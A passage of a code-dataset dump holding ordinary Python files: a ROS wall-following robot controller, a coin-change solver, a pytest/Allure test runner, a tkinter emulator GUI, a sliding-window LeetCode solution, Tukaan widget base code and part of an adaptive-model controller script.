}\n","sub_path":"as/src/asm/parsing/grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"218442667","text":"#!/usr/bin/env python\nimport math\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import LaserScan\n\n\n# Check if there seems to be an object in front of the robot, on the data from the left value to the right value, if any of them are less than minRange then return's false\ndef freeFront(data, left, right, minRange):\n for i in range(left, right):\n ranger = data[i]\n if ranger < minRange:\n return False\n\n return True\n\n\n# Returns true if the robot can move forward the specified distance\n# (Takes into account width of robot)\ndef canMoveForward(data, distance):\n robotWidth = 1.5\n # How many reading it will check (distributed evenly across 180 degrees)\n values = range(1, 30)\n for i in values:\n maxReading = abs((robotWidth/2)/math.cos(math.radians((180/values[-1])*i)))\n if maxReading > distance:\n maxReading = distance\n reading = data[(len(data) / values[-1]) * i]\n #rospy.loginfo(\"Reading \"+str(maxReading) + \" ~ index \"+str((len(data) / values[-1]) * i))\n if reading < maxReading:\n return reading\n return -1\n\n\ndef findAverage(data, low, high):\n temp = 0;\n count = 0;\n for i in range(low, high):\n if (data[i] != float('NaN') and data[i] != float('Inf')):\n temp = temp + data[i]\n count = count + 1\n if count == 0:\n return 20\n else:\n return temp / count\n\n\ndef findGreater(data, fLow, fHigh, sLow, sHigh):\n firstAverage = findAverage(data, fLow, fHigh)\n secondAverage = findAverage(data, sLow, sHigh)\n\n rospy.loginfo(\n \"Front \" + str(firstAverage) + \"; Back \" + str(secondAverage) + \" = \" + str(firstAverage - secondAverage))\n\n return firstAverage - secondAverage\n\n\ndef laser_callback(laser_data):\n global detectedWall\n\n new_speed = Twist()\n\n maxSpeed = 0.3# 0.25\n maxRotateSpeed = 0.3# 0.3 # negative value = rotate right\n divider = 1\n\n # Values of laser indicators that indicate front\n frontLeft = 200\n frontRight = 300\n minRange = 0.75\n\n # Detected first wall\n maxRangeLeft = 1.5\n desRangeLeftMin = 0.75\n desRangeLeftMax = 0.76\n\n # Range to indicate back right\n firstLower = 0\n firstHigher = 64\n # Range to indicate front right\n secondLower = 64\n secondHigher = 128\n\n rospy.loginfo(\"STUFF \" + str(detectedWall))\n\n collision = canMoveForward(laser_data.ranges, minRange)\n\n if collision != -1:\n # find new wall by rotating\n if collision < 0.4:\n new_speed.linear.x = 0.0\n else:\n new_speed.linear.x = maxSpeed * 0.5\n new_speed.angular.z = maxRotateSpeed * 2\n rospy.loginfo(\"Rotating for collision \")\n else:\n new_speed.linear.x = maxSpeed\n averageLeft = findAverage(laser_data.ranges, firstLower, secondHigher)\n # if have a wall to our right\n if averageLeft < maxRangeLeft:\n if detectedWall < 100:\n detectedWall += 5\n if desRangeLeftMin <= averageLeft <= desRangeLeftMax:\n # wall is nicely away from us\n rospy.loginfo(\"Wall is nicely away from us\")\n new_speed.linear.x = maxSpeed\n new_speed.angular.z = 0.0\n if averageLeft < desRangeLeftMin:\n # wall is too close: rotate away from wall\n rospy.loginfo(\"Wall is too close\")\n new_speed.linear.x = maxSpeed\n new_speed.angular.z = maxRotateSpeed\n if averageLeft > desRangeLeftMax:\n # wall is too far: rotate towards wall\n rospy.loginfo(\"Wall is too far\")\n new_speed.linear.x = maxSpeed\n new_speed.angular.z = 
-(maxRotateSpeed)\n\n if findGreater(laser_data.ranges, firstLower, firstHigher, secondLower, secondHigher) < -1:\n rospy.loginfo(\"Detected convex wall\")\n new_speed.linear.x = maxSpeed\n new_speed.angular.z = -(maxRotateSpeed)\n else:\n # No wall to our left\n new_speed.linear.x = maxSpeed\n if detectedWall > 0:\n detectedWall -= 1\n if detectedWall > 25:\n new_speed.angular.z = -maxRotateSpeed * 1.5\n\n pub.publish(new_speed)\n\n\nif __name__ == '__main__':\n detectedWall = 0\n rospy.init_node('obstacle_stopper')\n\n raw_input('turn on motors and press enter to start')\n\n rospy.Subscriber('base_scan', LaserScan, laser_callback)\n pub = rospy.Publisher('cmd_vel', Twist, queue_size=100)\n rospy.spin()\n","sub_path":"exercise2/src/wall_hugger.py","file_name":"wall_hugger.py","file_ext":"py","file_size_in_byte":4592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"643487731","text":"#!/usr/bin/python\n\nimport sys\n\n\ndef making_change(amount, denominations):\n # Initialize cache\n cache = [0] * (amount + 1)\n cache[0] = 1\n\n # For each possible coin, starting with the smallest\n for coin in denominations:\n # For every amount between that coin value and the total amount\n for amount2 in range(coin, amount + 1):\n # Add the number of solutions found if we took out that coin\n cache[amount2] += cache[amount2 - coin]\n\n return cache[amount]\n\nif __name__ == \"__main__\":\n # Test our your implementation from the command line\n # with `python making_change.py [amount]` with different amounts\n if len(sys.argv) > 1:\n denominations = [1, 5, 10, 25, 50]\n amount = int(sys.argv[1])\n else:\n print(\"Usage: making_change.py [amount]\")\n","sub_path":"making_change/making_change.py","file_name":"making_change.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"365445636","text":"#coding:utf-8\nimport os\nimport pytest\nimport argparse\nfrom config import BaseConfig\nfrom common.tools import get_case_dir,send_dingding\nfrom common.utils import dingTalk\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(description=\"argparse\")\n parser.add_argument('--product', type=str, default=BaseConfig.current_name)\n return parser\n\n\nif __name__ == \"__main__\":\n parser = get_parser()\n args = parser.parse_args()\n BaseConfig.current_name = args.product\n # 获取要执行的产品的用例目录\n test_case_dir = get_case_dir(args.product)\n print(\"********此次执行的产品测试用例是:%s********\"%test_case_dir)\n\n #删除之前报告\n os.system('rm ./report/tmp/*.json')\n # 生成报告数据\n pytest.main(['-v', '-s', test_case_dir, '--alluredir', './report/tmp'])\n # 打开报告\n os.system('allure serve ./report/tmp')\n\n # 发送钉钉\n send_dingding(args.product)\n\n\n\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"500280972","text":"#!/usr/bin/env python3\n\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import filedialog\n\nfrom machine import Machine\nfrom gui_mem_inspect import MemInspect\n\nclass Gui(Tk):\n def __init__(self, machine):\n super().__init__()\n self.machine = machine\n self.title(\"Windlass\")\n self.columnconfigure(0, weight=1)\n self.rowconfigure(0, weight=1)\n\n # Create mainframe inside of root window. 
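# NOTE (editor-added verification, assumes making_change above is in scope):
# the ways to make 11 from {1, 5, 10} are 11x1; 6x1 + 1x5; 1x1 + 2x5;
# 1x1 + 1x10 -> 4. Because coins drive the outer loop, each combination is
# counted once regardless of coin order.
print(making_change(11, [1, 5, 10]))   # 4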
Seems redundant, but\n # ttk widgets can be themed, while regular tkninter widgets can't.\n mainframe = ttk.Frame(self, padding=\"3 3 3 3\", relief=\"flat\")\n mainframe.grid(column=0, row=0, sticky=(N, S, E, W))\n mainframe.columnconfigure(0, weight=1)\n mainframe.rowconfigure(0, weight=1)\n\n # Create topframe that will hold the buttons & registers.\n topframe = ttk.Frame(mainframe, relief=\"flat\")\n topframe.grid(column=0, row=0, sticky=(N, S, E, W))\n topframe.columnconfigure(0, weight=1)\n topframe.rowconfigure(0, weight=1)\n \n\n # --------------------------------------------------------------------\n # BUTTONS\n # --------------------------------------------------------------------\n button_frame = ttk.Frame(topframe, relief=\"sunken\")\n button_frame.grid(column=0, row=0)\n buttons = [ ttk.Button(button_frame, text=\"Load\", command=self._load)\n , ttk.Button(button_frame, text=\"Step\", command=self._step)\n , ttk.Button(button_frame, text=\"Run\", command=self._run)\n , ttk.Button(button_frame, text=\"Stop\", command=self._stop)\n ]\n for button in buttons:\n button.pack(side=LEFT)\n\n # --------------------------------------------------------------------\n # REGISTERS & IO\n # --------------------------------------------------------------------\n # StringVars for register Entry widgets.\n self.PC = StringVar()\n self.IR = StringVar()\n self.OR = StringVar()\n self.ACC = StringVar()\n self.input = StringVar()\n self.output = StringVar()\n \n self._copy_registers()\n \n register_frame = ttk.Frame(topframe)\n register_frame.grid(column=0, row=1, pady=3, sticky=(N, S, E, W))\n \n PC_label = ttk.Label(register_frame, text=\"PC\")\\\n .grid(row=0, column=0, sticky=W)\n PC_entry = Entry(register_frame)\n PC_entry.config(width=7, textvariable=self.PC, relief=\"flat\")\n PC_entry.grid(row=0, column=1, sticky=E)\n \n IR_label = ttk.Label(register_frame, text=\"IR\")\\\n .grid(row=1, column=0, sticky=W)\n IR_entry = Entry(register_frame)\n IR_entry.config(width=7, textvariable=self.IR, relief=\"flat\")\n IR_entry.grid(row=1, column=1, sticky=E)\n \n OR_label = ttk.Label(register_frame, text=\"OR\")\\\n .grid(row=2, column=0, sticky=W)\n OR_entry = Entry(register_frame)\n OR_entry.config(width=7, textvariable=self.OR, relief=\"flat\")\n OR_entry.grid(row=2, column=1, sticky=E)\n \n ACC_label = ttk.Label(register_frame, text=\"ACC\")\\\n .grid(row=3, column=0, sticky=W)\n ACC_entry = Entry(register_frame)\n ACC_entry.config(width=7, textvariable=self.ACC, relief=\"flat\")\n ACC_entry.grid(row=3, column=1, sticky=E)\n\n # --------------------------------------------------------------------\n # STATUS\n # --------------------------------------------------------------------\n # status_frame = ttk.Frame(mainframe)\n # status_frame.grid(column=1, row=2, sticky=(S, E, W))\n\n # self.status = StringVar()\n # self.status.set('HALTed')\n # status = Label(status_frame, textvariable=self.status)\n # status.pack(fill=BOTH)\n \n # --------------------------------------------------------------------\n # I/O\n # --------------------------------------------------------------------\n bottomframe = ttk.Frame(mainframe)\n bottomframe.grid(row=1, column=0, sticky=(N, S, E, W))\n\n self.console = Text(bottomframe)\n self.console.config(width=80, height=12)\n self.console.grid(row=0, column=0, sticky=(N, S, E, W))\n self.console.config(state=DISABLED)\n # TODO: Disable scrolling w/ mousewheel.\n # TODO: Lock view to bottom of buffer ('autoscroll')\n\n self.input = Entry(bottomframe)\n 
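# NOTE (editor-added sketch of the read-only console idiom used here): a Text
# kept DISABLED must be flipped to NORMAL around each insert, which is exactly
# what Gui._print below does; see(END) also covers the 'autoscroll' TODO above.
from tkinter import Text, NORMAL, DISABLED, END

def append_readonly(text_widget: Text, line: str) -> None:
    text_widget.config(state=NORMAL)
    text_widget.insert(END, line + "\n")
    text_widget.see(END)                # keep the newest output visible
    text_widget.config(state=DISABLED)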
self.input.config(width=80)\n self.input.grid(row=1, column=0, sticky=(E, W))\n self.input.config(state=DISABLED)\n\n self._print(\"Machine ready.\")\n\n\n # --------------------------------------------------------------------\n # BUTTON COMMANDS\n # --------------------------------------------------------------------\n \n def _load(self):\n self.machine.load_text(filedialog.askopenfilename())\n\n #self.status.set(\"Program loaded. Click step to step through\")\n\n def _step(self):\n self.machine.step()\n self._copy_registers()\n #if self.machine.needs_input:\n # self.status.set(\"Machine needs input.\\n\"\n # \"Enter value in input field and press enter.\")\n \n def _run(self):\n self.machine.run()\n self._copy_registers()\n #if self.machine.needs_input:\n # self.status.set(\"Machine needs input.\\n\"\n # \"Enter value in input field and press enter.\")\n\n def _stop(self):\n self.machine.running = False # TODO: Reduce coupling\n\n # --------------------------------------------------------------------\n # PRIVATE HELEPERS\n # --------------------------------------------------------------------\n\n def _copy_registers(self):\n # TODO: Reduce coupling\n self.PC.set(self.machine.PC)\n self.OR.set(self.machine.OR)\n self.IR.set(str(self.machine.IR))\n self.ACC.set(self.machine.ACC)\n\n def _give_input(self, *args):\n self.machine.take_input(self.input.get())\n self._copy_registers()\n #self.status.set(\"Input accepted, HALT'd.\")\n\n def _print(self, s):\n self.console.config(state=NORMAL)\n self.console.insert(END, s + \"\\n\")\n self.console.config(state=DISABLED)\n\nif __name__ == \"__main__\":\n m = Machine()\n g = Gui(m)\n mi = MemInspect(g)\n g.mainloop()\n","sub_path":"gui_main.py","file_name":"gui_main.py","file_ext":"py","file_size_in_byte":6443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"570807433","text":"class Solution:\n def maxSlidingWindow0(self, nums, k: int):\n '''\n 给定一个数组 nums,有一个大小为 k 的滑动窗口从数组的最左侧移动到数组的最右侧。\n 你只可以看到在滑动窗口 k 内的数字。滑动窗口每次只向右移动一位。\n 返回滑动窗口最大值。\n 输入: nums = [1,3,-1,-3,5,3,6,7], 和 k = 3\n 输出: [3,3,5,5,6,7]\n '''\n if len(nums) <= 0:\n return []\n\n maxAry = [None] * (len(nums) - k + 1)\n\n for i in range(len(maxAry)):\n maxAry[i] = max(nums[i:i + k])\n\n return maxAry\n\n def maxSlidingWindow(self, nums, k: int):\n '''\n 给定一个数组 nums,有一个大小为 k 的滑动窗口从数组的最左侧移动到数组的最右侧。\n 你只可以看到在滑动窗口 k 内的数字。滑动窗口每次只向右移动一位。\n 返回滑动窗口最大值。\n 输入: nums = [1,3,-1,-3,5,3,6,7], 和 k = 3\n 输出: [3,3,5,5,6,7]\n '''\n if len(nums) <= 0:\n return nums\n max_ary = [max(nums[:k])]\n max_val = max_ary[0]\n for i in range(k, len(nums)):\n if nums[i] > max_val:\n max_val = nums[i]\n # 最大值滑出窗口\n elif nums[i - k] == max_val:\n max_val = max(nums[i - k + 1:i + 1])\n max_ary.append(max_val)\n return max_ary\n\n\ns = Solution()\nprint(s.maxSlidingWindow([1, 3, -1, -3, 5, 3, 6, 7], 3))\nprint(s.maxSlidingWindow([1, -1], 1))\nprint(s.maxSlidingWindow([7, 2, 4], 2))\n","sub_path":"Leetcode/239.maxSlidingWindow.py","file_name":"239.maxSlidingWindow.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"504138515","text":"from __future__ import annotations\n\nimport collections.abc\nimport contextlib\nimport re\nfrom functools import partial, partialmethod\nfrom typing import Any, Callable, Iterator, Literal\n\nfrom ._constants import _BINDING_ALIASES, _KEYSYMS, _VALID_STATES\nfrom ._event import Event\nfrom ._layouts import LayoutManager\nfrom ._misc import 
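# NOTE (editor-added alternative, not part of the original solution): the
# standard O(n) monotonic-deque answer to the same problem, for comparison with
# the slice-based versions above, which are worst-case O(n*k).
from collections import deque

def max_sliding_window(nums, k):
    dq, out = deque(), []              # dq holds indices; their values decrease
    for i, x in enumerate(nums):
        while dq and nums[dq[-1]] <= x:
            dq.pop()                   # drop values dominated by x
        dq.append(i)
        if dq[0] <= i - k:
            dq.popleft()               # front index fell out of the window
        if i >= k - 1:
            out.append(nums[dq[0]])    # front of the deque is the window max
    return out

print(max_sliding_window([1, 3, -1, -3, 5, 3, 6, 7], 3))   # [3, 3, 5, 5, 6, 7]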
ScreenDistance, TukaanError\nfrom ._utils import (\n _callbacks,\n _widgets,\n create_command,\n from_tcl,\n get_tcl_interp,\n py_to_tcl_arguments,\n reversed_dict,\n update_before,\n)\n\n\nclass ChildStatistics:\n def __init__(self, widget) -> None:\n self._widget = widget\n\n def number_of_type(self, type) -> int:\n try:\n return self._widget._child_type_count[type]\n except KeyError:\n return 0\n\n @property\n def children(self) -> list[BaseWidget]:\n return list(self._widget._children.values())\n\n @property\n def grid_managed_children(self) -> tuple:\n return tuple(\n self._widget.from_tcl(elem)\n for elem in self._widget._tcl_call((str,), \"grid\", \"slaves\", self._widget)\n )\n\n @property\n def position_managed_children(self) -> tuple:\n return tuple(\n self._widget.from_tcl(elem)\n for elem in self._widget._tcl_call((str,), \"place\", \"slaves\", self._widget)\n )\n\n\nclass MethodAndPropMixin:\n _tcl_call: Callable\n _keys: dict[str, Any]\n layout: LayoutManager\n tcl_path: str\n wm_path: str\n parent: TkWidget\n child_stats: ChildStatistics\n\n def __repr__(self) -> str:\n return (\n f\"\"\n )\n\n __str__ = __repr__\n\n def _repr_details(self) -> str:\n # overridden in subclasses\n return \"\"\n\n @property\n def is_busy(self) -> bool:\n return self._tcl_call(bool, \"tk\", \"busy\", \"status\", self)\n\n @is_busy.setter\n def is_busy(self, is_busy) -> None:\n if is_busy:\n self._tcl_call(None, \"tk\", \"busy\", \"hold\", self)\n else:\n self._tcl_call(None, \"tk\", \"busy\", \"forget\", self)\n\n @contextlib.contextmanager\n def busy(self):\n self.is_busy = True\n try:\n yield\n finally:\n self.is_busy = False\n\n @property\n def id(self) -> int:\n return self._tcl_call(int, \"winfo\", \"id\", self.tcl_path)\n\n def _cget(self, key: str) -> Any:\n if isinstance(self._keys[key], tuple):\n type_spec, key = self._keys[key]\n else:\n type_spec = self._keys[key]\n\n if type_spec == \"func\":\n # return a callable func, not tcl name\n result = self._tcl_call(str, self, \"cget\", f\"-{key}\")\n return _callbacks[result]\n\n if isinstance(type_spec, dict):\n result = self._tcl_call(str, self, \"cget\", f\"-{key}\")\n return reversed_dict(type_spec)[result]\n\n return self._tcl_call(type_spec, self, \"cget\", f\"-{key}\")\n\n def config(self, **kwargs) -> None:\n for key in tuple(kwargs.keys()):\n if isinstance(self._keys[key], tuple):\n # if key has a tukaan alias, use the tuple's 2-nd item as the tcl key\n kwargs[self._keys[key][1]] = kwargs.pop(key)\n\n get_tcl_interp()._tcl_call(\n None, self, \"configure\", *py_to_tcl_arguments(**kwargs)\n )\n\n @classmethod\n def from_tcl(cls, tcl_value: str) -> TkWidget:\n # unlike in teek, this method won't raise a TypeError,\n # if the return widget, and the class you call it on isn't the same\n # this could be annoying, but very useful if you don't know\n # what kind of widget it is and just want to get it\n\n # teek.Button.from_tcl(teek.Label().to_tcl())\n # >>> TypeError: blablabla\n\n # tukaan.Button.from_tcl(teek.tukaan().to_tcl())\n # >>> '.app.label_1'\n\n if tcl_value == \".\":\n return get_tcl_interp()\n\n return _widgets[tcl_value]\n\n def to_tcl(self) -> str:\n return self.tcl_path\n\n @property\n def _class(self):\n return self._tcl_call(str, \"winfo\", \"class\", self)\n\n @property\n def keys(self) -> list:\n return sorted(self._keys.keys())\n\n @property\n def bbox(self) -> tuple:\n return (self.x, self.y, self.x + self.width, self.y + self.height)\n\n @property # type: ignore\n @update_before\n def x(self) -> int:\n return 
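# NOTE (editor-added sketch of the pattern behind the busy() helper above): a
# contextmanager sets a flag, yields, and always restores it, so the busy state
# cannot get stuck if the body raises. Names below are illustrative.
import contextlib

@contextlib.contextmanager
def flag(obj, attr):
    setattr(obj, attr, True)
    try:
        yield obj
    finally:
        setattr(obj, attr, False)   # runs even when the body raises

class Widget:
    is_busy = False

w = Widget()
with flag(w, "is_busy"):
    assert w.is_busy
assert not w.is_busy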
self._tcl_call(int, \"winfo\", \"rootx\", self)\n\n @property # type: ignore\n @update_before\n def y(self) -> int:\n return self._tcl_call(int, \"winfo\", \"rooty\", self)\n\n @property # type: ignore\n @update_before\n def width(self) -> int:\n return self._tcl_call(int, \"winfo\", \"width\", self)\n\n @property # type: ignore\n @update_before\n def height(self) -> int:\n return self._tcl_call(int, \"winfo\", \"height\", self)\n\n def focus(self):\n self._tcl_call(None, \"focus\", self)\n\n def hide(self):\n if self.tcl_path == \".app\" or self._class == \"Toplevel\":\n self._tcl_call(None, \"wm\", \"withdraw\", self.wm_path)\n elif self.layout._real_manager == \"grid\":\n self._tcl_call(None, \"grid\", \"remove\", self.tcl_path)\n elif self.layout._real_manager == \"place\":\n self._temp_position_info = self._tcl_call(\n {\"-x\": int, \"-y\": int, \"-anchor\": str, \"-width\": int, \"-height\": int},\n \"place\",\n \"info\",\n self.tcl_path,\n )\n self._tcl_call(None, \"place\", \"forget\", self.tcl_path)\n\n def unhide(self):\n if self.tcl_path == \".app\" or self._class == \"Toplevel\":\n self._tcl_call(None, \"wm\", \"deiconify\", self.wm_path)\n elif self.layout._real_manager == \"grid\":\n self._tcl_call(None, \"grid\", \"configure\", self.tcl_path)\n elif self.layout._real_manager == \"place\":\n self._tcl_call(\n None,\n (\n \"place\",\n \"configure\",\n self.tcl_path,\n *(\n elem\n for key, value in self._temp_position_info.items()\n for elem in (key, value)\n if value is not None\n ),\n ),\n )\n\n def __parse_sequence(self, sequence: str) -> str:\n tcl_sequence = sequence\n regex_str = r\"\"\n\n if sequence in _BINDING_ALIASES:\n tcl_sequence = _BINDING_ALIASES[sequence]\n elif re.match(regex_str, sequence):\n search = re.search(regex_str, sequence)\n up_or_down = {\"Down\": \"Press\", \"Up\": \"Release\"}\n thing = search.group(2) # type: ignore\n tcl_sequence = f\"\" # type: ignore\n\n return tcl_sequence\n\n def _call_bind(\n self,\n widget_or_all: MethodAndPropMixin | Literal[\"all\"],\n sequence_s: tuple[str, ...] | str,\n func: Callable | Literal[\"\"],\n overwrite: bool,\n sendevent: bool,\n data: Any,\n ) -> None:\n def _real_func(func: Callable, data: Any, sequence: str, *args):\n event = Event(sequence, func, data)\n\n for (_, type_, attr), string_value in zip(_BINDING_SUBSTS, args):\n try:\n value = from_tcl(type_, string_value)\n if attr == \"keysymbol\":\n if value == \"??\":\n value = None\n elif value in _KEYSYMS.values():\n value = reversed_dict(_KEYSYMS)[string_value]\n except (ValueError, TukaanError):\n # ValueError when trying to int(\"??\")\n value = None\n\n setattr(event, attr, value)\n\n return func() if not sendevent else func(event)\n\n subst_str = \" \".join(subs for subs, *_ in _BINDING_SUBSTS)\n\n if isinstance(sequence_s, str):\n sequence_s = (sequence_s,)\n for sequence in sequence_s:\n self._tcl_call(\n None,\n \"bind\",\n widget_or_all,\n self.__parse_sequence(sequence),\n f\"{'' if overwrite else '+'} if\"\n + f\" {{[{create_command(partial(_real_func, func, data, sequence))}\"\n + f\" {subst_str}] eq {{break}} }} {{ break }}\"\n if callable(func)\n else \"\", # FIXME: this is disgustingly unreadable\n )\n\n def _bind(\n self,\n what,\n sequence: tuple[str, ...] 
| str,\n func: Callable,\n overwrite: bool = False,\n sendevent: bool = False,\n data=None,\n ) -> None:\n self._call_bind(\n what if what == \"all\" else self, sequence, func, overwrite, sendevent, data\n )\n\n def _unbind(self, what, sequence: str):\n self._call_bind(\n what if what == \"all\" else self, sequence, \"\", True, False, None\n )\n\n def generate_event(self, sequence: str):\n self._tcl_call(None, \"event\", \"generate\", self, self.__parse_sequence(sequence))\n\n bind = partialmethod(_bind, \"self\")\n unbind = partialmethod(_unbind, \"self\")\n bind_global = partialmethod(_bind, \"all\")\n unbind_global = partialmethod(_unbind, \"all\")\n\n\nclass TukaanWidget:\n \"\"\"Base class for every Tukaan widget\"\"\"\n\n ...\n\n\nclass TkWidget(MethodAndPropMixin):\n \"\"\"Base class for every Tk-based widget\"\"\"\n\n layout: LayoutManager\n\n def __init__(self):\n self._children: dict[str, BaseWidget] = {}\n self._child_type_count: dict[type, int] = {}\n _widgets[self.tcl_path] = self\n self.child_stats = ChildStatistics(self)\n\n\n_BINDING_SUBSTS = (\n (\"%D\", float, \"delta\"),\n (\"%K\", str, \"keysymbol\"),\n (\"%k\", str, \"keycode\"),\n (r\"%W\", TkWidget, \"widget\"),\n (r\"%X\", ScreenDistance, \"rel_x\"),\n (r\"%Y\", ScreenDistance, \"rel_y\"),\n (r\"%height\", ScreenDistance, \"height\"),\n (r\"%width\", ScreenDistance, \"width\"),\n (r\"%x\", ScreenDistance, \"x\"),\n (r\"%y\", ScreenDistance, \"y\"),\n)\n\n\nclass StateSet(collections.abc.MutableSet):\n \"\"\"\n Object that contains the state of the widget,\n though it inherits from MutableSet, it behaves like a list\n \"\"\"\n\n def __init__(self, widget: TkWidget) -> None:\n self._widget = widget\n\n def __repr__(self) -> str:\n return f\"\"\n\n def __iter__(self) -> Iterator[str]:\n return iter(self._widget._tcl_call([str], self._widget, \"state\"))\n\n def __len__(self) -> int:\n return len(self._widget._tcl_call([str], self._widget, \"state\"))\n\n def __contains__(self, state: object) -> bool:\n return self._widget._tcl_call(bool, self._widget, \"instate\", state)\n\n def add_or_discard(self, action: Literal[\"add\", \"discard\"], state: str) -> None:\n if state not in _VALID_STATES:\n raise RuntimeError\n if action == \"discard\":\n state = f\"!{state}\"\n\n self._widget._tcl_call(None, self._widget, \"state\", state)\n\n add: Callable[[str], None] = partialmethod(add_or_discard, \"add\")\n discard: Callable[[str], None] = partialmethod(add_or_discard, \"discard\")\n\n\nclass BaseWidget(TkWidget):\n _keys: dict[str, Any | tuple[Any, str]]\n\n def __init__(self, parent: TkWidget | None, **kwargs) -> None:\n self.parent = parent or get_tcl_interp()\n self.tcl_path = self._give_me_a_name()\n self._tcl_call: Callable = get_tcl_interp()._tcl_call\n\n TkWidget.__init__(self)\n\n self.parent._children[self.tcl_path] = self\n\n self._tcl_call(\n None, self._tcl_class, self.tcl_path, *py_to_tcl_arguments(**kwargs)\n )\n\n self.layout = LayoutManager(self)\n self._temp_manager = None\n\n if self._tcl_class.startswith(\"ttk::\"):\n self.state = StateSet(self)\n # else:\n # need to define separately for non-ttk widgets\n\n def __setattr__(self, key: str, value: Any) -> None:\n if key in self._keys.keys():\n self.config(**{key: value})\n else:\n super().__setattr__(key, value)\n\n def __getattr__(self, key: str) -> Any:\n if key in self._keys.keys():\n return self._cget(key)\n else:\n return super().__getattribute__(key)\n\n def _give_me_a_name(self) -> str:\n klass = type(self)\n\n # FIXME: more elegant way to count child 
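# A minimal, self-contained sketch of the partialmethod pattern used for
# bind/unbind/bind_global/unbind_global above: one private implementation,
# with the scope argument pre-bound per public name.
from functools import partialmethod

class BindDemo:
    def _bind(self, scope, sequence):
        return ("all" if scope == "all" else "widget", sequence)

    bind = partialmethod(_bind, "self")
    bind_global = partialmethod(_bind, "all")

demo = BindDemo()
assert demo.bind("<1>") == ("widget", "<1>")
assert demo.bind_global("<1>") == ("all", "<1>")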
types\n # itertools.count isn't good, because we need plain ints\n\n count = self.parent._child_type_count.get(klass, 0) + 1\n self.parent._child_type_count[klass] = count\n\n return f\"{self.parent.tcl_path}.{klass.__name__.lower()}_{count}\"\n\n def destroy(self):\n for child in self.child_stats.children:\n child.destroy()\n\n self._tcl_call(None, \"destroy\", self.tcl_path)\n del self.parent._children[self.tcl_path]\n del _widgets[self.tcl_path]\n","sub_path":"tukaan/_base.py","file_name":"_base.py","file_ext":"py","file_size_in_byte":13192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"313507126","text":"import numpy as np\nimport os.path\nfrom argparse import ArgumentParser\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import AdaBoostClassifier, RandomForestClassifier\nfrom sklearn.cluster import KMeans\nfrom typing import List, Optional, Tuple\n\nfrom dataset.dataset import Dataset, DataSeries\nfrom models.adaptive_model import AdaptiveModel\nfrom threshold_optimization.optimize_thresholds import get_serialized_info\nfrom utils.rnn_utils import get_logits_name, get_states_name, AdaptiveModelType, get_input_name\nfrom utils.np_utils import index_of, round_to_precision\nfrom utils.constants import OUTPUT, BIG_NUMBER, SMALL_NUMBER, INPUTS, SEQ_LENGTH, DROPOUT_KEEP_RATE\nfrom utils.file_utils import save_pickle_gz, read_pickle_gz, extract_model_name\nfrom controllers.distribution_prior import DistributionPrior\n\n\nPOWER = np.array([24.085, 32.776, 37.897, 43.952, 48.833, 50.489, 54.710, 57.692, 59.212, 59.251])\nVIOLATION_FACTOR = 0.01\nUNDERSHOOT_FACTOR = 0.01\nCONTROLLER_PATH = 'model-logistic-controller-{0}.pkl.gz'\nMARGIN = 1000\nMIN_INIT = 0.8\nMAX_INIT = 1.0\nC = 0.01\nNOISE = 0.01\n\n\ndef get_power_for_levels(power: np.ndarray, num_levels: int) -> np.ndarray:\n assert num_levels <= len(power), 'Must have fewer levels than power estimates' \n\n if len(power) == num_levels:\n return power\n\n median_index = int(len(power) / 2)\n start_index = median_index - int(num_levels / 2)\n end_index = start_index + num_levels\n return power[start_index:end_index]\n\n\ndef fetch_model_states(model: AdaptiveModel, dataset: Dataset, series: DataSeries):\n logit_ops = [get_logits_name(i) for i in range(model.num_outputs)]\n state_ops = [get_states_name(i) for i in range(model.num_outputs)]\n stop_output_ops = ['stop_output_{0}'.format(i) for i in range(model.num_outputs)]\n\n data_generator = dataset.minibatch_generator(series=series,\n batch_size=model.hypers.batch_size,\n metadata=model.metadata,\n should_shuffle=False)\n # Lists to keep track of model results\n labels: List[np.ndarray] = []\n states: List[np.ndarray] = []\n stop_outputs: List[np.ndarray] = []\n level_predictions: List[np.ndarray] = []\n level_logits: List[np.ndarray] = []\n\n # Index of state to use for stop/start prediction\n states_index = 0\n if model.model_type == AdaptiveModelType.CASCADE:\n states_index = -1\n\n seq_length = model.metadata[SEQ_LENGTH]\n num_sequences = model.num_sequences\n\n for batch_num, batch in enumerate(data_generator):\n # Compute the predicted log probabilities\n feed_dict = model.batch_to_feed_dict(batch, is_train=False)\n model_results = model.execute(feed_dict, logit_ops + state_ops + stop_output_ops)\n\n first_states = np.concatenate([np.expand_dims(np.squeeze(model_results[op][states_index]), axis=1) for op in state_ops], axis=1) # [B, D]\n\n inputs = np.array(batch[INPUTS])\n 
states.append(first_states)\n\n # Concatenate logits into a [B, L, C] array (logit_ops is already ordered by level).\n # For reference, L is the number of levels and C is the number of classes\n logits_concat = np.concatenate([np.expand_dims(model_results[op], axis=1) for op in logit_ops], axis=1)\n level_logits.append(logits_concat)\n\n # Compute the predictions for each level\n level_pred = np.argmax(logits_concat, axis=-1) # [B, L]\n level_predictions.append(level_pred)\n\n true_values = np.squeeze(batch[OUTPUT])\n labels.append(true_values)\n\n batch_stop_outputs = np.concatenate([np.expand_dims(model_results[op], axis=1) for op in stop_output_ops], axis=1) # [B, T]\n stop_outputs.append(batch_stop_outputs)\n\n states = np.concatenate(states, axis=0)\n level_predictions = np.concatenate(level_predictions, axis=0)\n labels = np.concatenate(labels, axis=0).reshape(-1, 1)\n level_logits = np.concatenate(level_logits, axis=0)\n stop_outputs = np.concatenate(stop_outputs, axis=0)\n\n y = (level_predictions == 